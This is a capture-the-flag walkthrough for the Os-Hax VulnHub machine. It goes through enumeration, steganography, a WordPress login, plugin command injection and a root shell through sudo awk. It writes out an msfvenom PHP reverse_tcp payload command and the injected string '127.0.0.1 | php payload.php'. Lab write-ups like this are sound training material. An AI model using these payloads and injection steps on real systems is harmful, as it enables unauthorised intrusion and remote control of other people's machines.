Os-Hax Walkthrough vulnhub CTF

Today we are solving Os-Hax Walkthrough for and this CTF is designed by.. Rahul Gehlaut
Os-Hax walkthrough

You can download here. (Os-Hax Walkthrough)

Level: Intermediate

Boot to Root

Tool Used

  •  Netdiscover
  •  Dirb
  •  Nmap
  •  ExifTool
  •  Metasploit

Find of All IP  We did this using the Netdiscover command

Os-Hax walkthrough

we can continue to our second step that is scanning the target With Nmap Aggressive scan

We found port 22, 80 Open HTTP

Type your machine IP in the web browser

Os-Hax walkthrough

Without wasting time enumerate the Directory

Enumerate the Directory With Dirb

Os-Hax walkthrough

And Found some directory  you will navigate to the following URL

And Find A Our First Flag

Os-Hax walkthrough

Now Download Image file flaghost.png

Data Exfiltration-Steganography

Now After Download the image Extract-Data Image

Os-Hax walkthrough

And Find Next Hint found a directory [email protected]

After Open the directory find the Flag2.txt

Open the file Flag2.txt

And Find Brain-Fuck Encode Code

And After Decode the Coad Find A WordPress Password

Decoder Website https://www.splitbrain.org/_static/ook/

Username: web

Password: [email protected]

            Next Step is Add a host file some Text

Vi /etc/hosts

After Add, My CTF IP and localhost Save the file

And Open Follow the URL Find a WordPress  Page

Without waste a time open the WordPress  login panel

Os-Hax walkthrough

And login with already found password

And after login WordPress Found a vulnerable Plugin Activity Manager

Os-Hax walkthrough

And open Activity Manager tool found a command injection

Let’s Check the command

And this is working after the command I see the output

Os-Hax walkthrough

After Check command injection work and create our payload with Metasploit

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4545 -f raw

open vi editor save the output text payload.php

create a Python Server

wget command download our payload target machine

Os-Hax walkthrough

First, remove maxlenght=15 to 100 inspect element

Os-Hax walkthrough

Execute our payload this command 127.0.0.1 | php payload.php

Os-Hax walkthrough

And got a reverse connection

Os-Hax walkthrough

First import python for proper shell

Os-Hax walkthrough
Os-Hax walkthrough

and I see our 3 flag

Privilege Escalation

For finding the 4th flag we need to escalate root privilege, let’s identify sudo rights for Alice with the help of the following command.

So here Alice can run awk as root without using the password and we can easily spawn root shell by exploiting this permission

Os-Hax walkthrough

FLAG 4: COMPLETE! Congratulations

Author Name: Rahul Gehlaut see more blog here